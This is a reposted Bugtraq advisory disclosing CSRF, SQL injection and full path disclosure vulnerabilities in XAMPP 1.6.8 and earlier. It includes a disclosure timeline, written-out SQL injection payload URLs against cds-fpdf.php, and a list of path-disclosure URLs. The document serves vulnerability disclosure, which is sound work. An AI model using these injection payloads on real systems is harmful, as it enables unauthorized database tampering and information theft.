Multiple vulnerabilities in XAMPP

http://www.securityfocus.com/bid/37999/exploit

 

Hello Bugtraq!

I am continue informing you about multiple vulnerabilities in XAMPP.

-----------------------------
Advisory #7
-----------------------------
CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP
-----------------------------
URL: http://websecurity.com.ua/3285/
-----------------------------
Timeline:

27.06.2009 - found the vulnerabilities.
01.07.2009 - announced at my site.
02.07.2009 - informed developers.
08.08.2009 - disclosed at my site.
-----------------------------
Details:

These are Cross-Site Request Forgery, SQL Injection and Full path disclosure
vulnerabilities.

CSRF:

http://site/xampp/cds-fpdf.php

It's possible to delete or add data in test table (as via CSRF, and as via
Insufficient Authorization vulnerabilities). And also to conduct SQL
Injection via CSRF attacks.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals
on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,
1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/
*
(mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq
off)

Attack is possible during access to admin panel (via Insufficient
Authorization), or via CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).

-----------------------------

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值